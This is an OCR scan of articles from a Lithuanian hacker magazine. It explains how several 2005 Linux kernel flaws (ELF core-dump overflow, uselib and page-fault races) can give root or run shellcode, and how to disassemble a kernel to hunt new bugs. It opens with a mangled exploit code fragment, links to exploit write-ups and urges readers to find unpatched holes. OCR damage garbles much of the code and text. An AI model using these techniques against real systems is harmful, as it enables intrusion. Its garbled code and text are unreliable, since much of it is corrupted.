printf(“ | - [060.14s]Vi“, check); 
if (" (deck + 5) 0x30 88 "(check + 6) 0x38) 
1 
check += 5; 

printf(“ | - suitable value found! using 0x060.98Nn“, check); 
"(check +9) — 0400; (check) — X; "(—-cdhed) — (V; 
mod — (unsigned int "Įstrtoul(check, O, 0) ; 


for (sock — O; sak < — 200; sak + +) 
"(mod + +) — (inljong code; 

if ((sock — socket(AF BLUETOOTH, SOCK RAW, arg)) < 0) 
printf(“ | - invalid valveNi“); 


exit(1); 
H 
| 
) 


[Elfai krenta į skylę] Šiu eilučių rašymo metu buvo surasta 
pati šviežiausia skylė — ELF užkrovėjo pažeidžiamumas, kuris 
buvo aptiktas 2005 metų kovo 11 dieną ir darantis įtaką ištisai 
branduolių serijai: 2.2.27-rc2, 2.4, 2.4.31-pr1, 2.6, 2.6.12- 
rc4 ir t.t. Klaida tūno funkcijoje elf co- , 

re dump(), kuri yra byloje binfmt elf.c. Esmi- 
nis pažeidžiamumo fragmentas atrodo štai taip: 
Esminis funkcijos „elf core dump()“ fragmen- 
tas, kuriam gresia perpildymas 


4) K.core 
45 Moconfig 


static int elf core dump(loną signr, struct pt regs "regs, struct 
file *file) 

t 

struct elf pipsinfo psinfo; inetd 
memset(£psinfo, O, sizeof(psinfo)); 


( 
inti, len; /* 1 7/ 


len current- > mm- 014 end - current->mm- VŽ 
-01ą start; What is a trojan horse? 
if (len > ELF PRAR6S7) / 2 "/ - 


len — ELF PRARGSZ - |; 
copy from user(Rpsinfo.pr. psargs, (const char ")current- 
-mm---arg start, len); 


) 


Bay Networks 45 
4) midikeys 


Tipiškas buferio perpildymas! Programuotojas apibrėžia kin- 
tamąjį len (žr. /* 1 */), o po kurio laiko perduoda jį funkcijai 
copy from user(), kuri kopijuoja duomenis iš vartotojiškos 
atminties zonos į branduolio sritį. Čia nėra tikrinama neigia- 
ma reikšmė (žr. /* 2 */). Ką mums tai reiškia praktiniu po- 
žiūriu? O gi štai ką! Jeigu current- >mm- >arg start bus 
daugiau už current->mm->arg end, į branduolio atmin- 
ties erdvę bus nukopijuotas didelis vartotojiškos erdvės re- 
gionas. 

O kaip tai galima pasiekti? Analizė rodo, kad kintamieji current- 
>mm->arg start ir current->mm- >arg end inicializuojami 
funkcijoje create elf tables(), beje, jeigu funkcija strmlen useri) 
grąžins klaidą, tai bus inicializuotas tik kintamasis current. > mm 
>arg start, 0 current- >mm->arg end išsaugos savo reikšmę, 
kuri bus paveldėta iš ankstesnės bylos. 


Esminis funkcijos „create elf tables()“ fragmentas 
static elf addr 1“ 
ceate elf tables(char "p, int argc, int envc, 
strud elfhdr "exec, 
unsigned long load addr, 
unsigned long load bias, 
unsigned long interp load addr, int ibos) 
Į 
current- > mm- 019 stai! 
while (argc— > 0) 
| 


(unsigned long)p; 


put user((elf caddr !)(unsigned long)p, argv + + ); 
len stmlen user(p, PAGE SIZE “ MAX ARG PAGES); 
if (Yen || len - PAGE SIZE* MAX ARG PAGES) 
return NULL; // warn 


p len; 


| 
put user(NULL, argv); 


current- > mm >01g end  current- > mm- >env start — (unsigned long)p; 


II 


Ascend 
MAX4002 4) 
MAX4004 
MAX4048 

and MAX 4077 


] Plakatas, išvardinants pagrindinius Linux pažeicdlžiamumus 


" 


ĮHAKERIS 01 [32] 06 


62| 


HAKERIS 01 [32] 06 


Telieka vieni niekai. Reikia apgauti funkciją strmlen usert), įkur- 
dinus abu kintamuosius ELF bylos sekcijoje su uždaru priėjimu 
(PROT NONE), į kurią kreipiantis įvyks išimtinė situacija (excep- 
tion). Branduolys, norėdamas įrašyti programos core dump'ą, 
iškviečia core dumpi), kuri savo ruožtu iškviečia elf core dump(), 
0 čia ir įvyks perpildymas! Branduolio srities perrašymas atveria 
praktiškai neribotas galimybes, juk shell kodas vykdomas nuli- 
niame žiede! 

Demonstracinis eksploitas yra čia: www.isec.pl/vulnerabilities/ 
isec-0023-coredump.txt 


[Daugiasrautiškumo problemos] Klasikiniame Unix'e iš vi 
so nebuvo jokių srautų (threads), todėl nebuvo ir jų sinchro 
nizavimo problemos. Su funkcija fork() ir išplėtotomis tarp 
procesorinės sąveikos priemonėmis srautai nelabai ir reika- 
ingi. Tačiau jie vis dėlto atsirado ir tuo pačiu sistemoje pri 
darė skylių iki pat dugno. Branduolys pavirto tikra klaidų san 
kaupa. Stai tik viena iš jų, aptikta 2005 metų sausio pra 
džioje Ir veikianti visus 2.2 versijos branduolius ir branduo- 
lius, kurių versijos yra nuo 2.4 iki 2.4.29-pre3 ir nuo 2.6 iki 
2.6.10 imtinai. Peržvelgsime funkcijos /oad elf library(), ku 
rią naujos bibliotekos užkrovimo metu automatiškai iškviečia 
funkcija sys uselib(), fragmentą: 

Esminis funkcijos „load elf library()“ fragmentas, kuriame yra 
srautų sinchronizavimo klaida 


static int load elf library(struct file *file) 


lown  write(Rcurrent- > mm- > mmap sem); // war 
enor do mmap(file, 


ELF PAGESTART(elf phdata 


p vaddr) 


(elf phdata-->p. filesz 
ELF PAGEOFFSET(elf phdata---p. vaddr)), 
PROT READ | PROT WRITE | PROT EXEC, 


MAP FHXED | MAP PRIVATE 
elf phdata- p. offsel 
ELF PAGEOFFSET(elf phdata 


MAP DENYWRITE, 
p vaddr))); 
up: write(8current- > mm- >mmap sem); 


f (error != ELF PAGESTART(elf phdata 
goto out free ph; 


p vaddr)) 
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elf bss — elf phdata->p vaddr + elf phdata 
padzero(ell bss); 
len — ELF PAGESTART(elf phdata- p. filesz 


olf phdato->p vadd + ELF MIN ALIGN - I) 
bss  elf phdata---p 

if (bss > len) 
do brk(len, bss 


memsz + elf phdata---p 


vaddi 


len); // wart 


Kaip mes matome, semaforas mmap sem išlaisvinamas iki 
funkcijos do brk() iškvietimo, tuo pačiu sukurdamas srautų sin 
chronizavimo problemą. Tuo pat metu funkcijos sys brk() funk 
cijos analizė įtikina mus tuo, jog funkcija do brk() turėtų būti 
iškviečiama su aktyvuotu semaforu. Aptarsime išeities teksto 
fragmentą, pasiskolintą iš bylos mm/mmap.c: 

Esminis funkcijos „sys brk()“ fragmentas, kenčiantis nuo tarny 
binių duomenų struktūrų koherentiškumo pažeidimo 


vyma kmem cache alloc(ym area cachep, SLAB KERNEL); // war 


if (Ivma) 


return -ENOMEM 

vyma->vm mm MM; 

yma- ym start add 

yma--vm end addr + len; 

vma- ym flags flags; 

yma--vm page prot protection map[flags 8 Ox0f] 
ymo--vm ops  NULI 

vma- ym pgolf O) 

vma- >vm file  NULL 

yma- -vm private data NULI 


vma link(mm, vma, prev, rb link, tb parent); 

Kai semaforas deaktyvuotas, virtualios atminties būklė gali būt 
pakeista tarp funkcijų kmem cache alloc() ir vma linki) iškvie 
timų, 0 tuomet vėl sukurtas VMA deskriptorius bus išsaugotas 
visai ne toje vietoje, kurioje tikėjosi kūrėjai! Siekiant root teisių, 
to daugiau nei pakanka. 

Deja, net ir paprasčiausias eksploitas užima per daug vietos, 
todėl čia jis negali būti pateiktas, tačiau jo išeities tekstus leng 
vai galima rasti internete. Originali versija su išsamiu nulaužimo 
technikos aprašymu guli čia: www.isec.pl/vulnerabilities/isec 
0021 -uselib.txt. 


[Kaip gauti „root“ teises daugiaprocesorinėse mašinose| 
O štai kitas įdomus pažeidžiamumas, pasakytinas apie didesnį 
branduolių su 2.4/2.6 versijomis kiekį ir paveikiantis multipro 
cesorines mašinas. Šis pažeidžiamumas buvo aptiktas pačioje 
2005 metų pradžioje, tačiau jis vis dar lieka aktualus, kadangi 
toli gražu ne visi administratoriai įdiegė atitinkamus pataisy- 
mus, 0 multiprocesorinės mašinos (įskaitant ir mikroproceso- 
rius su Hyper-Threading palaikymu) mūsų dienomis greičiau tai- 
syklė, nei retenybė. 

Dėl visko kaltas priėjimo prie puslapių klaidų doroklis (page 
fault handler), kuris iškviečiamas kiekvieną kartą, kai progra- 
ma kreipiasi į neišskirtą arba apsaugotą atminties puslapį. 


Tačiau ne visos klaidos yra vienodai lemtingos. Kitaip tariant, 
Linux (kaip ir daugelis kitų sistemų) steko atmintį išskiria ne 
iš karto, o dalimis. Išskirtos atminties viršuje yra puslapis, 
priėjimas prie kurio sąmoningai uždraustas. Jis vadinasi „sar 
gybos“ puslapiu (GUARD PAGE). Stekas nuolat auga ir tam 
tikru laiko momentu „isirėžia“ į sargybinį puslapį, tuo pačiu 
sukeldamas išimtinę situaciją (exception). Ją perima page 
fault handler, ir operacinė sistema stekui išskiria tam tikrą 
atminties kieki, perkeldama sargybinį puslapį į viršų. Maši- 
nose su vienu procesoriumi ši schema veikia kaip laikrodis, 
bet multiprocesorinėse... 

Esminis bylos „/mm/fault.c“ fragmentas, kuriame yra sinchroni- 
zacijos klaida 


down read(ėmm- > mmap sem); /* worn */ 
ma = find vma(mm, address); 
if (lyma) 
goto bad are; 
f (yma->vm star! 
goto good area; 
if (!(vma->>vm Aags 8 VM GROWSDOWN)) 
goto bad Greg; 
if (amor code 8 4) ( 
if (address + 32 
goto bad area; 


if (expand stack(yma, address) 
goto bad area; 


address) 


regs- -65p) // Worn 


Kadangi page fault handler yra vykdomas su semaforu, kuris 
prieinamas tik skaitymui, keletas konkuruojančių srautų gali vienu 
metu įeiti į doroklį po eilutės /* warn */. Aptarsime, kas nutiks, 
jeigu du srautai, kurie dalinasi viena ir ta pačia virtualia atmin- 
timi, vienu metu iškvies page fault handler. Apytikslis atakos 
scenarijus atrodo štai taip: srautas 1 kreipiasi į sargybinį pusla- 
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pį ir iškviečia išimtį fault 1. Srautas 2 kreipiasi į puslapį GU- 
ARD PAGE + PAGE SIZĖ ir iškviečia išimtį fault 2. Štai kaip 
atrodo virtualios atminties būklė tuo metu, kai page fault hand- 
ler iškviečia du srautai: 
[ NOPAGE ] [fault 1] [ VMA ] 
[fault 2] [ NOPAGE ] [ VMA] 


higher addresses 


Jeigu srautas 2 aplenks srautą 1 ir pirmasis išskirs savo puslapį 
PAGE1, tai srautas 1 sukels rimtą pažeidimą virtualios atmin- 
ties valdymo programoje, kadangi apatinis steko puslapis da- 
bar yra aukščiau fault 2, todėl puslapis PAGE2 realiai nėra iš 
skiriamas, tačiau prie jo gali prieiti ir į jį skaityti/rašyti abu srau- 
tai, 0 po proceso užbaigimo jis nebus pašalintas! Virtualios at 
minties būklė išėjimo iš page fault handler metu: 

| PAGE2 | [PAGEI VMA | 
Kas yra PAGE2 puslapyje? Priklauso nuo puslapių lentelės (pa 
ge table) būklės. Kadangi Linux sistemoje fizinė atmintis yra 
kaip savotiškas virtualios adresų erdvės kešas, vieną ir tą patį 
puslapį skirtingu metu gali naudoti tiek branduolys, tiek ir varto- 
tojo programos (taip pat ir privilegijuoti procesai). 
Sulaukęs, kuomet į PAGE2 pateks branduolio arba kokio nors 
privilegijuoto proceso kodas (tai lengva nustatyti pagal signa- 
tūrą), hakeris gali čia įterpti shell kodą arba tiesiog suorgani- 
zuoti grandiozinį DoS'ą, į PAGE2 prikišdamas beprasmių 
šiukšlių. Nepaisant pakankamai solidaus šio pažeidžiamu 
mo amžiaus, paruošto eksploito surasti taip ir nepavyko, ta- 
čiau būtų visai nesunku jį parašyti savarankiškai. Kaip būtent 
tai daryti, parašyta čia: www.isec.pl/vulnerabilities/isec 
0022-pagefault.txt. 


[Pabaiga] Ilgai Linux buvo laikoma „teisinga“ operacine siste- 
ma, kuri yra patikimai apsaugota nuo virusų ir hakerių atakų. 
Tačiau taip nėra. Linux sistemoje skylių net daugiau nei Win- 
dows'uose, o daugelis jų yra kritinio pobūdžio. ELF 
bylų užkroviklis tikras klaidų lizdas, iš kurio jos 
tiesiog veržiasi per kraštus. Dar daugiau klaidų kyla 
dėl daugiasrautiškumo palaikymo. Jeigu Windows sis- 
temoje srautai egzistavo nuo pat pradžių ir sinchro- 
nizacijos problemos buvo sprendžiamos žemiausia- 
me pamatų lygyje, tai Linux'ui „svetimas“ daugias- 
rautiškumas buvo sinchronizuotas paskubomis. 

Klaidos kaupiasi aplink semaforus. Ieškok sema- 
forų, ir surasi klaidų. Kokia prasmė naudoti jau 
paruoštus eksploitus, kuriems jau sukurti patai- 
symai? Hakeriškas kodas gaunasi per daug nu- 
geibęs ir negyvybingas. Administratorių aktyvumas 
auga kiekvieną dieną, serveriai aprūpinami au- 
tomatinio atnaujinimo sistemomis, todėl išgyventi 
šiame pasaulyje darosi vis sunkiau ir sunkiau. 
Būtent todėl reikia atlikinėti savarankiškus tyri- 
mus, mokėti analizuoti pradinį ir mašininį kodą, 
aptikti jame dar niekam nežinomas klaidas, ku- 
rioms skirtų vaistukų dar nėra. Istorijos aušroje 
žmogus su šautuvu galėjo užkariauti pasaulį. Kuo 
gi mes blogesni? Kitas šio ciklo straipsnis papa- 


Indonezijos banko svetainė, kurią defeisino du hakenai per page fault handier pažeidžia- 


1ma 


sakos apie tai, kokie įrankiai naudojami Linux 
branduolio analizei ir kaip hakeriai ieško klaidu. 
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„Linux“ branduolio šturmas 


BRANDUOLYS — TAI VISOS SISTEMOS PA- 
GRINDAS. GERO LINUKSO SU SKYLĖTU 
BRANDUOLIU NESUKURSI. KŪRĖJAI NESI- 
TRAUKIA NUO KLAVIATŪROS AISKINDAMIE- 
SI VIS NAUJAS KLAIDAS, TACIAU JOS DAU- 
GINASI GREICIAU! ANAIPTOL NE VISOS 
KLAIDOS YRA PAVOJINGOS IR TIK NEDAU- 
GELIS IS JŲ LEIDZIA PER ATSTUMĄ ĮSI- 
SKVERBTI Į SISTEMĄ. SURASTI TOKIĄ KLAI- 
DĄ — DIDELĖ SĖKMĖ. KAIP HAKERIAI STU- 
DIJUOJA BRANDUOLĮ? KOKIUS ĮRANKIUS 
NAUDOJA? BŪTENT APIE TAI MES DABAR 
IR PAKALBĖSIME. 


„Kernel hacking“ 
paslaptys 

[Įvadas] Linux branduolys — tai 
ganėtinai sudėtingas inžinerinis 
statinys, kurio išeities tekstai 
užima daugiau nei šimtą megabaitų. Ko tik čia nėra! Tvarkyk- 
lės, TCP/IP stekas, virtualios atminties valdymas, srautų pla- 
nuotuvas, ELF bylų užkroviklis ir daugelis kitų dalykų. Tiesą 
sakant, visame šiame ūkyje tiesiog knibždėte knibžda klaidu, 
kurių ieško dešimtys hakerių grupių ir tūkstančiai nepriklau- 
somų kodo tyrinėtojų visame pasaulyje. Nori tapti vienu iš 
jų? Kokie dar gali būti klausimai! Kas gi to nenori! Tiesa, ne 
visiems tai pavyksta, ypač iš pirmojo karto, tačiau svarbiau- 
sia gera pradžia! 


[Branduolio išorėje] Egzistuoja mažiausiai dvi klaidų paieškos 
metodikos, tačiau abi jos ydingos ir neteisingos. Vieni hakeriai 
pirmenybę teikia branduolio išeities tekstų peržiūrai, analizuo- 
dami eilutę po eilutės, kiti disasembliuoja veikiantį branduolį. 
Štai nepilnas pirmojo būdo trūkumų sąrašas: 

1. Vietoje faktinės kintamojo reikšmės C kalboje visur, Kur 
tik imanoma, naudojami makrosai, apibrėžiami neaišku kur, 
beje, makrosai gali būti iš naujo apibrėžti dar daug kartų 


arba, kas dar blogiau, visose prijungiamose bylose gali būti 
naudojami papildomi nepriklausomi makrosai su vienodais 
vardais, todėl globali kontekstinė paieška, kurią praktikuoja 
daugelis tyrinėtojų, čia nepadeda (tiesa, galima išeities tekstus 
prasukti per preprocesorių „cpp bylos pavadinimas.c“, ta 
čiau nuo to apimtis, o tai reiškia, Kad ir analizės laikas, tik 
išauga). 
2. Nė viena man žinoma IDE negali atvaizduoti kryžminių nuo 
rodų | funkcijas/duomenis, trasuoti valdymo srauto ir daryti dau- 
gybės kitų naudingų dalykų, su kuriais lengvai susidoroja bet 
koks padorus disasembleris. 

3. Kompiliavimo procese gali „užsimaskuoti“ vienos klaidos ir 
atsirasti naujos, be to, niekada negalima iš anksto sakyti, ko 
kiais adresais ir kokia tvarka kompiliatorius atmintyje išdėstys 
kintamuosius ir buferius, o norint parašyti shell kodą tai yra 
kritinis momentas. 

Kita vertus, disasembliuotas branduolio listingas ne šiaip sau 
didelis. Jis milžiniškas! Tai milijonai asemblerinio Kodo eilu- 
Čiu, Ir jeigu kiekvienai komandai sugaištume bent keletą se- 
kundžių, net ir paviršutiniška analizė užtruktų mažiausiai se- 
zoną. Bet juk mums ir nereikia disasembliuoti viso branduo- 
lio! Klaidos nėra plonu sluoksniu „išteptos“ po visą mašininį 
kodą, o slypi visiems žinomose vietose. Niekas nesako, kad 
ieškoti klaidų paprasta. Tačiau tai įdomu! Prisipažink, nejau- 
gi tau niekada nesinorėjo žvilgtelėti į branduolį, rankomis pa- 
čiupinėti mašininį kodą ir pažiūrėti, kaip visa tai atrodo gyvai 
(tai yra, „iš tikrųjų“), 0 ne išeities tekstuose, kuriuos bet ku- 
ris „tikras hakeris“ gali parsisiusti iš interneto? Ir tuoj turėsi 


šią galimybę! 


[Branduolio šturmas] Visų pirma, branduolio šturmui 
mums prireiks paties branduolio, kurį mes ruošiamės štur 
muoti. Kokį distributyvą pasirinkti? Geriau imti tą, kuris nau- 
Įesnis, nors jie ypatingai nesiskiria, juk branduolys kuria- 
mas nepriklausomai nuo viso likusio „įdaro“. Svarbiausia, 
kad jis būtų visuotinai paplitęs, nes priešingu atveju kokia 
nauda iš skylės, kuri yra tik vienoje- dviejose viso pasaulio 
mašinose? 

Branduolys įsikūręs kataloge /boot ir vadinasi vmlinuz. Iš tie 
sų tai dar ne branduolys, 0 tik simbolinė nuoroda į jį. O pats 
branduolys yra šalia ir vadinasi vmlinuz.x.y.z, kur XyZ bran 
duolio versija. Mes parodysime, kaip paskersti 2.4.27 ir 2.6.7 
branduolius, kurie įeina į mano mylimą distributyvą Knoppix 
Visi likusieji branduoliai tyrinėjami analogiškai, tačiau, 
savaime suprantama, poslinkiai bus kiti. 
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Be pačios dvejetainės bylos mums taip pat prireiks j0S išei 
ties tekstų, į kuriuos mes prireikus žvilgtelėsimeė. Jeigu jie 
neieina į distributyva (o daugelis populiariu distributyvų Už 
ima viso labo viena CD ir yra platinami be 
juos galima parsisiusti iš www.kernel.org/pub/linux/kernel/. 
Mums teks parvilkti nuo 25 iki 45 Mb ir archyvo išpakavimui 
atlaisvinti bent 150-300 Mb. Visi branduoliai pateikiami su- 
pakuoti dviem formatais standartiniu gzip ir pažangesniu 
bzip2, kuris spaudžia 2596 smarkiau, Kas branduolio dydi su- 
mažina vos ne 10 Mb, o modeminiam susijungimui tai labai 
apčiuopiamas dydis. 

Kalbant apie disasemblerį, tai vargu ar rasi ką nors geriau 
už IDA Pro. Dar visai neseniai IDA Pro veikė tik MS DOS, 
0S/2 ir Windows sistemose, tačiau dabar ji perkelta ir į 
Linux, kas negali nedžiuginti. Senesnių versijų savininkams 
galima pasiūlyti nusikopijuoti branduolį į diskelį Ir disasem 
bliuoti jį Windows sistemoje arba pasinaudoti Wine emulia 
toriumi IDA Pro puikiai veikia ir jame. Beje, | Linux 
kelta tik konsolinė versija, Kurioje nėra visų grafinių grožy 
bių, pavyzdžiui, diagramų. 
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Jeigu nėra pinigų nusipirkti IDA Pro, galima išbandyti HT-edi- 
tor tai nemokamas hex redaktorius ir disasembleris viena- 
me. Jis automatiškai atstato kryžminės nuorodas, trasuoja val- 
dymo srautą, palaiko simbolinius vardus ir komentarus. Gru- 
biai šnekant, tai apkarpyta miniatiūrinė /DA Pro versija. Pasku- 
tinės versijos išeities tekstus galima parsisiųsti iš hte.sf.net. 
HT-editor sėkmingai kompiliuojasi Linux, FreeBSD, OpenBSD 
ir, be jokios abejonės, Win32 sistemose. O jeigu tu tingi kom- 
piliuoti, tai gali parsisiųsti jau paruoštą vykdomą bylą, kuri, 
tiesą sakant, yra ne pirmo šviežumo. 


[Branduolio viduje] Ateina jaudinanti akimirka: vmlinuz byla 
užkraunama į disasemblerį! Prasideda įdomioji dalis: /DA Pro 
negali atpažinti formato ir užkrauna jį kaip dvejetainį, kas nėra 
gerai. Branduolio struktūra labai sudėtinga, ją sudaro keletas 
nuosekliai vienas po kito apdorojamų užkroviklių, o pagrindinė 
branduolio dalis yra supakuota. Kaip susitvarkyti su visu šiuo 
ūkiu? Minimali užduotis: suskaidyti branduolį į modulius, nu- 
stačius kiekvieno iš jų bazinį užkrovimo adresą ir adresų erdvės 
dydi. Kai kas gali pasakyti: „O kame problemos? Juk mes turi- 
me išeities tekstus!“. Ką gi, išeities tekstai, be jokios abejonės, 
yra gerai, bet iškyla klausimas - kokia byla atitinka kokią bran- 
duolio dalį? Taigi be gero vadovo čia neapsieisime! 

Pirmieji 200h vmlinuz bylos baitų priklauso boot sektoriui, 
kuris kraunamas adresu 0000:7C00 ir yra vykdomas 16 bitų 
režime. Nuspaudžiame <Alt-S> arba einame į meniu Edit - 
> Sesment -> Edit Segment (čia ir toliau karštosios klavišų 
kombinacijos galioja /DA Pro 4.7 versijai, kitose versijose šios 
kombinacijos gali šiek tiek skirtis). Įvedame segmento pava- 
dinimą: boot, pradinio adreso nekeičiame, o galutinį pakei- 
čiame į 200h. | visus grėsmingus perspėjimus atsakome vie- 
nareikšmišku TAIP Po to nuvedame kursorių prie pirmojo ko- 
do baito ir nuspaudžiam <C>, kad IDA Pro atminties celes 
paverstų kodu. Po to disasembliavimą galima tęsti įprastai. 
Užkroviklio išeities tekstą galima rasti byloje /arch/i386/bo- 
ot/bootsect.S, tačiau jos galima ir neieškoti — užkroviklis 
mums nėjįdomus. Per metų metus jis buvo išlaižytas iki bliz- 
gesio. Net jeigu jame ir liko kokių nors klaidų, tai pasinaudo- 
ti jomis greičiausiai nepavyks. 

Mes matome, kad boot sektorius persikelia į adresą 
9000h:0000h ir iš disko nuskaito antrinį užkroviklį, kuris taip 
pat yra vmlinuz viduje, iš karto už boot sektoriaus. Čia yra se- 
tup.S ir video.S moduliai, užkraunami adresu 1000h:0000h ir 
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Segmento atributų pakeitimas su IDA Pro 


veikiantys 16 bitų režime. Modulio setup.S pradžia atpažįstama 
pagal HdrS signatūrą, kuri eina po įmp. Modulio video.S pabai- 
gą lengva rasti pagal eilutes: CGA/MDA/HGA/EGA/VGA/VESA/Vi-- 
deo adapter, po kurių eina „magiška seka“ 00 00 B8 00 00. 
Abiejuose branduoliuose pabaiga yra su 14FFh poslinkiu nuo 
bylos pradžios. Taip antrinis užkroviklis prasideda nuo poslinkio 
200h ir baigiasi ties 14FFh. Jis taip pat vykdomas 16 bitų reži- 
me ir tai yra kodo bei duomenų mišinys, todėl jį disasembliuoti 
tenka ypač atsargiai. Tačiau prieš tai reikia sukurti naują seg- 
mentą, nes ankstesnis buvo nukirstas! Sukomanduojame Edit 
> Segment -> New Segment, įvedame segmento pavadini- 
mą (pavyzdžiui, „Idr“), pradžios (200h) ir pabaigos (1500h) ad- 
resus bei pagrindinį adresą, kuris lygus pradiniam adresui, pa- 
dalintam iš 10h. Priverstinai nurodome 16 bitų režimą ir spau- 
džiame OK. 
Už antrinio užkroviklio eina 100h „niekieno“ baitų, kurie užpil- 
dyti nuliais, o po to nuo 1500h poslinkio prasideda kažkoks 
laukinis kodas, kurio niekaip nepavyksta disasembliuoti. IDA iš- 
veda viso labo keletą eilučių, graudžiai inkščia ir atsisako pra- 
tęsti darbą: 


„IDA Pro“ disasembliuoja „laukinį“ koda 
1600 dd 

1601 di 

1602 mov ax, 18h 

1605 db 0 

1606 db 0 

1607 db 8Eh ; 0 

1608 db 0D8h ; - 


HTE ir HIEW lyg ir disasembliuoja šį laukinį kodą, tačiau daro tai 
neteisingai! 


Neteisingas disasembliavimo rezultatas 
1600 K dd 

1601 fa di 

1602 b81800 mov ax, 0x18 

1605 0000 add [bx + si), al 

1607 8ed8 mov ds, ax 

1609 8ecO mov es, ax 

160b 8ee0 mov Is, ax 

160d 8ee8 mov gs, ax 


O viskas tik todėl, kad būtent nuo šios vietos branduolys prade- 
da vykdytis 32 bitų apsaugotame (protected) režime, todėl no- 
rint toliau teisingai disasembliuoti, reikia pakeisti segmento bi- 
tų kiekį. Po to /DA Pro pradės veikti lyg niekur nieko. Dabar mes 
esame išpakuotuve, kuris pagrindinį branduolio kodą paruošia 
darbui. Jis realizuotas byloje /arch/i386/boot/compressed/he- 
ad.S ir misc.c. Jis neturi „asmeninio“ užkrovimo adreso ir krau- 
nasi kartu su pirminiu užkrovėju adresu 1000h:0000h. Taip 
pirmasis išpakuotuvo baitas atsiranda atmintyje adresu 
1000h:0000h + sizeof(ldf) == 1000h:01300h, kas atitinka 
fizinį adresą 101300h. Išpakuotuvas suderina segmentinius re- 
gistrus DS/ES/SS/GS/FS į selektorių 18h, o registrą CS — i 
selektorių 10h. 

Po išpakavimo programos eina tekstinės eilutės „System hal- 
ted“, „Ok, booting the kernel“, „invalid compressed format 
(err=1)“, po to — ilga nulių grandinė, ir galiausiai prasideda 


supakuotas kodas, kurį disasembliuoti iš anksto neišpakavus 
neimanoma. O kaip jį išpakuoti? Kadangi linuksoidai nemėgs- 
ta išradinėti dviračio ir visada siekia naudoti jau paruoštus 
komponentus, branduolys suspaustas su gzip. 

Supakuotas kodas prasideda nuo „magiškosios sekos“ 1F 8B 08 
00, kurią lengva surasti su bet kuriuo hex redaktoriumi. 2.4.27 
versijos branduolyje jis yra Su poslinkiu 4904h nuo bylos pradžios, 
o 2.6.7 branduolyje — su poslinkiu 49D4h. Išskirsime sritį nuo čia 
iki bylos pabaigos ir įrašysime ją į bylą su £Z praplėtimu (pavyzdžiui, 
kernel.gz). Perleidę šią bylą per gzip (gzip -d kernel.gz), mes išėji 
me gausime disasembliavimui paruoštą branduolio atvaizdą (ima- 
ge). IDA Pro jau laukia, kada jis bus į ją užkrautas. 

Pagrindinis branduolio kodas vykdomas 32 bitų režime ir į at 
mintį kraunamas adresu 10:C0100000h. Pačioje pradžioje yra 
modulis /arch/i386/kernel/head.S, o po to init.c, kuris užkrau- 
na visus likusius modulius. Kaip nustatyti, kokį būtent modulį 
atitinka duota disasembliuoto kodo dalis? Kataloge /boot sau- 
goma nuostabi byla System.map-x.y.z (Kur xyZ yra branduolio 
versijos numeris), kurioje išvardinti viešų simbolinių pavadinimų 
adresai, kitaip dar vadinami žymėmis: 


Bylos „System.map-2.4.27“ fragmentas 
c0108964 T system call 

c(010899c T ret from sys call 
c01089ad t restore all 

(01089bc + signal return 

(01089d4 t v86 signal return 
c01089e4 t tracesys 

010807 ! tracesys exil 


(0108011 1 badsys 


Konkrečiau šnekant, 2.4.27 branduolyje žymę ret from sys call 
atitinka adresas C010899Ch. Iš čia atėmus pagrindinį adresą, 
mes gausime žymės poslinkį nuo bylos pradžios: 899Ch, na, o 
pačią žymę nesunku surasti išeities tekstuose, panaudojus glo 
balia paiešką. Ji yra byloje /arch/i386/kernel/entry.S. Likusios 
žymės apdorojamos analogiškai. 

O štai dar vienas triukas: jeigu branduolyje sutinkama tekstinė 
eilutė arba reta komanda, tokia, kaip /Iss arba mov cr4,xx, ją 
bus lengva aptikti išeities tekstuose su globalia paieška. Ka- 


2mbliavimas su HTE hex redaktoriumi 


dangi tokių komandų kompiliatorius iš anksto nesupranta, tai 
čia akivaizdžiai buvo įterptas asemblerinis intarpas, o tai reiš- 
kia, kad disasembliuotas kodas, galima sakyti, visiškai sutaps 
su atitinkamu išeities teksto fragmentu! 

Bendrai paėmus, branduolio disasembliavime nėra nieko ant 
gamtiško, todėl šią užduotį pajėgus atlikti bet kuris kodo kaps 
tytojas. 


[Kur kaupiasi klaidos] Taikomosiose ir serverinėse programo 
se daugiausia klaidų susikoncentravę persipildančiuose bufe 
riuose (buffer overflow ir buffer overrun tipo atakos). Branduo 
lyje taip pat yra buferiai, ir kai kurie iš jų gali būti perpildyti, 
tačiau šio tipo atakos jam ne tokios būdingos. 

Štai penki pagrindiniai klaidų šaltiniai: spinlokai (spin Iocks), 
netikėti išėjimai iš funkcijų, ELF užkrovėjas, virtualios atminties 
valdymas ir TCP/IP stekas. Aptarkime visus kandidatus išsamiau. 
Spinlokais vadinamos atminties ląstelės, apsaugojanėios dau- 
giaužduotinį kodą nuo pašalinių procesų poveikio. Įėjus | sau- 
gomą zoną, procesorius nustato specialią vėliavėlę, 0 iš jos 
išėjus ją atstato. Iki tol, kol vėliavėlė nebus atstatyta, |I- 
kusieji procesai trypčios prie įėjimo ir negalės vykdyti kodo. 
Daugiaprocesoriniuose branduoliuose spinlokai prasideda nuo 
LOCK prefikso, kurį lengva surasti disasembliuotame tekste, 
nuspaudus <ALT-T>. Daugiaprocesoriškumo (multitasking) 
galimybė labai sudėtinga užduotis, todėl čia tiesiog dau- 
gybė klaidų, taigi, niekas negali skųstis, kad „visos klaidos 
ištaisytos iki mūsų“. Deja, daugelis „daugiaprocesorinių“ 
klaidų yra daugelio pakopų pobūdžio, todėl nėra jokių uni- 
versalių jų paieškos metodų. Tai darbelis tikriems hakeriams, 
kurie sugeba galvoje išlaikyti visą branduolį ir išsklaidyta mo- 
zaiką sudėlioti į vientisą paveikslą. Žodžiu, tikras hardko- 
ras. Tai sudėtinga? Kur gi ne! Bet juk mes ir neieškome 
lengvų kelių, tiesa? Būtent todėl ir pasitenkinimas suradus 
klaidą kur kas didesnis, negu sėkmingai panaudojus viešą 
eksploitą. 


Klasikinio spinloko pavyzdys 

kernel:C010A65E loc COT0A65E: ; CODE XREF- sub C010A984 + 1084 
kernel:C010A65E lock dec byte ptr [ebx-3FCE77FOh] 

kernel:C010A665 js  loc C010AA81 


Netikėti išėjimai iš funkcijų (kitaip tariant priešlaikiniai) 
įvyksta kiekvieną kartą, kai dėl kokios nors klaidos funkcija 
negali (nenori) pratęsti darbo ir negaišdama įvykdo return. 
Dalis darbo tuo metu jau būna atlikta, o kita dalis dar ne. 
Jeigu programuotojas bent kiek neapsižiūrės, duomenų struk- 
tūros pavirs į košę. Viena iš tokių klaidų yra funkcijoje crea- 
te elf tables(), kuri buvo aprašyta straipsnyje „Nulinio žiedo 
užgrobimas“. 

